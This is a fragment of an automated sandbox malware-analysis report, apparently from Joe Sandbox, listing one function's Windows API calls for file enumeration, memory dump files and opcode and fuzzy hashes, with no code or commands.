                                  • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction Fuzzy Hash: 8B414971900209EFEF15DF98DC91EEEBBB5BF48304F188199F904A6212D3399960DF91
                                  Function 006C5190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006C8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C51CA
                                  • lstrcat.KERNEL32(?,006D1058), ref: 006C51E7
                                  • lstrcat.KERNEL32(?,014790D8), ref: 006C51FB
                                  • lstrcat.KERNEL32(?,006D105C), ref: 006C520D
                                    • Part of subcall function 006C4B60: wsprintfA.USER32 ref: 006C4B7C
                                    • Part of subcall function 006C4B60: FindFirstFileA.KERNEL32(?,?), ref: 006C4B93
                                    • Part of subcall function 006C4B60: StrCmpCA.SHLWAPI(?,006D0FC4), ref: 006C4BC1
                                    • Part of subcall function 006C4B60: StrCmpCA.SHLWAPI(?,006D0FC8), ref: 006C4BD7
                                    • Part of subcall function 006C4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 006C4DCD
                                    • Part of subcall function 006C4B60: FindClose.KERNEL32(000000FF), ref: 006C4DE2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: f5a512f930fc029f6f6f635e036057fa8df543fcdc23346cb10432a6154780bc
                                  • Instruction ID: 03b41b4ead9fec029f7486e48b314b46c1340fa0e4921e035223fea1a4c8bcfb
                                  • Opcode Fuzzy Hash: f5a512f930fc029f6f6f635e036057fa8df543fcdc23346cb10432a6154780bc
                                  • Instruction Fuzzy Hash: 4D212BB6904208BBD754F7B0EC52FFD733D9B44300F00454CB6569A281EE749AC88B95